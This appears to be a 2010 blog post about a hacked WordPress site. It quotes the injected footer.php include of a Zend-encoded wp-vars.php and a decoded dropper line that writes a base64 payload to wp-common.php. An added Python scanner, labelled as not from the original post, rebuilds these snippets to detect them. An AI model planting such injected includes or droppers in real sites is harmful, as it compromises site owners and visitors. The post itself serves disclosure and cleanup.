26 May

WordPress hacked with Zend encoded script

PHP, Wordpress

This time it happened on Hostgator. I found the following code in my footer.php file:

<?php @include_once(ABSPATH . "/wp-includes/wp-vars.php"); ?>
<?=@get_wp_results('f');?>

This totally screwed up my footer section and, on top of that, it made my website traffic go to zero. I immediately removed the code and discovered two files:
wp-includes/wp-vars.php, encoded with Zend, which I am unable to decode. It would be great if someone could decode this so we can see the malicious code.
wp-includes/wp-version.php, encoded with base64, which decoded to:
file_put_contents('wp-common.php', base64_decode($bb))

I deleted both of these files and everything seems ok now. I was unable to find wp-common.php so I assume it wasn’t created yet.
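A defender-side check built from the indicators in this post, as an added example (not code from the original post): it flags the three file names and the quoted snippets, and also looks inside long base64 literals, since wp-version.php was base64-encoded on disk. The function names, the sample tree and the eval(base64_decode(...)) wrapper are assumptions.

```python
import base64
import re
from pathlib import Path

REPORTED = {"wp-vars.php", "wp-version.php", "wp-common.php"}  # file names from the post
PATTERNS = {  # built from the snippets quoted in the post
    "includes wp-vars.php": re.compile(rb"include(_once)?\s*\(.*wp-vars\.php", re.I),
    "calls get_wp_results": re.compile(rb"get_wp_results\s*\(", re.I),
    "drops base64 payload": re.compile(rb"file_put_contents\s*\(.*base64_decode\s*\(", re.I),
}
B64_LITERAL = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")

def layers(data):
    """Yield the raw bytes, then each long base64 literal decoded once."""
    yield "", data
    for m in B64_LITERAL.finditer(data):
        try:
            yield " (inside base64 literal)", base64.b64decode(m.group(0), validate=True)
        except ValueError:  # looked like base64 but did not decode
            continue

def check_file(rel, data):
    """Return the set of (rel, reason) findings for one PHP file's bytes."""
    found = {(rel, why + sfx) for sfx, layer in layers(data)
             for why, rx in PATTERNS.items() if rx.search(layer)}
    if rel.startswith("wp-includes/") and rel.rsplit("/", 1)[-1] in REPORTED:
        found.add((rel, "file name reported in the post"))
    return found

def scan(root):
    """Walk a WordPress tree and return sorted findings for every .php file."""
    found = set()
    for path in Path(root).rglob("*.php"):
        if path.is_file():
            found |= check_file(path.relative_to(root).as_posix(), path.read_bytes())
    return sorted(found)

# Constructed sample. The eval(base64_decode(...)) wrapper is an assumption;
# the post shows only the decoded form of wp-version.php.
ENCODED = base64.b64encode(b"file_put_contents('wp-common.php',base64_decode($bb) );")
SAMPLE = {
    "wp-content/themes/demo/header.php": b"<?php wp_head(); ?>\n",
    "wp-content/themes/demo/footer.php": b'<?php @include_once(ABSPATH . '
        b'"/wp-includes/wp-vars.php"); ?>\n<?=@get_wp_results(\'f\');?>\n',
    "wp-includes/wp-version.php": b'<?php eval(base64_decode("' + ENCODED + b'")); ?>\n',
}

if __name__ == "__main__":
    print(sorted(f for rel, data in SAMPLE.items() for f in check_file(rel, data)))
```

Run `scan()` against the WordPress root; a hit on file name alone still deserves a look, because the Zend-encoded wp-vars.php would not match any content pattern.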

Downloads:
wp-vars


Wednesday, May 26th, 2010 at 12:29 pm and is filed under PHP, Wordpress.